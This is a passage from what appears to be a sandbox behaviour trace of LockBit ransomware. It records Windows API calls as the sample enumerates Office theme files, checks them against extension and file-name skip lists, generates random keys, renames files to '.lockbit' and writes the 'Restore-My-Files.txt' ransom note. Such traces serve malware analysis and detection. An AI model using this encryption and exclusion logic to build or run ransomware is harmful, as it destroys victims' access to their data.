nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.017] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.017] malloc (_Size=0xbc) returned 0x1fa2ed8 [0196.017] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0xc0000008 [0196.017] free (_Block=0x1fa2ed8) [0196.017] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.017] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.017] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.017] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8079f00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8079f00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perspective.xml", cAlternateFileName="PERSPE~1.XML")) returned 1 [0196.017] lstrcmpiW (lpString1=".", lpString2="Perspective.xml") returned -1 [0196.018] lstrcmpiW (lpString1="..", lpString2="Perspective.xml") returned -1 [0196.018] PathFindExtensionW (pszPath="Perspective.xml") returned=".xml" [0196.018] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.018] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.019] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perspective.xml") returned 1 [0196.019] lstrcmpiW (lpString1="ntldr", lpString2="Perspective.xml") returned -1 [0196.019] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perspective.xml") returned -1 [0196.019] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perspective.xml") returned -1 [0196.019] lstrcmpiW (lpString1="autorun.inf", lpString2="Perspective.xml") returned -1 [0196.019] lstrcmpiW (lpString1="thumbs.db", lpString2="Perspective.xml") returned 1 [0196.020] lstrcmpiW (lpString1="iconcache.db", lpString2="Perspective.xml") returned -1 [0196.020] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.020] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml") returned=".xml" [0196.020] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.020] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.020] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.021] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.021] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.021] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.021] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.021] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.lockbit") returned 89 [0196.021] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.022] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.022] malloc (_Size=0x40068) returned 0x3df0008 [0196.022] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3599) returned 1 [0196.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.023] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.023] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.023] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.023] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.028] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.029] malloc (_Size=0xc8) returned 0x1fa2ed8 [0196.029] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc8, FileInformationClass=0xa) returned 0xc0000008 [0196.029] free (_Block=0x1fa2ed8) [0196.029] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.029] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.029] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.029] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x938cc00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x938cc00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pushpin.xml", cAlternateFileName="")) returned 1 [0196.029] lstrcmpiW (lpString1=".", lpString2="Pushpin.xml") returned -1 [0196.029] lstrcmpiW (lpString1="..", lpString2="Pushpin.xml") returned -1 [0196.029] PathFindExtensionW (pszPath="Pushpin.xml") returned=".xml" [0196.029] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.029] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.030] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pushpin.xml") returned 1 [0196.031] lstrcmpiW (lpString1="ntldr", lpString2="Pushpin.xml") returned -1 [0196.031] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pushpin.xml") returned -1 [0196.031] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pushpin.xml") returned -1 [0196.031] lstrcmpiW (lpString1="autorun.inf", lpString2="Pushpin.xml") returned -1 [0196.031] lstrcmpiW (lpString1="thumbs.db", lpString2="Pushpin.xml") returned 1 [0196.031] lstrcmpiW (lpString1="iconcache.db", lpString2="Pushpin.xml") returned -1 [0196.031] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.031] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml") returned=".xml" [0196.031] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.031] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.031] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.032] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.032] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.lockbit") returned 85 [0196.032] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.035] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.035] malloc (_Size=0x40068) returned 0x3df0008 [0196.035] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3711) returned 1 [0196.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.036] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.036] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.042] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.042] malloc (_Size=0xc0) returned 0x1fa2ed8 [0196.042] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0196.042] free (_Block=0x1fa2ed8) [0196.042] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.042] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.042] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.042] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb208e9c0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb208e9c0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb20b4b20, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0196.042] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0196.043] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0196.043] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0196.043] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0196.043] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0196.044] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0196.044] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0196.044] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1a6f00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b1a6f00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Slipstream.xml", cAlternateFileName="SLIPST~1.XML")) returned 1 [0196.044] lstrcmpiW (lpString1=".", lpString2="Slipstream.xml") returned -1 [0196.044] lstrcmpiW (lpString1="..", lpString2="Slipstream.xml") returned -1 [0196.044] PathFindExtensionW 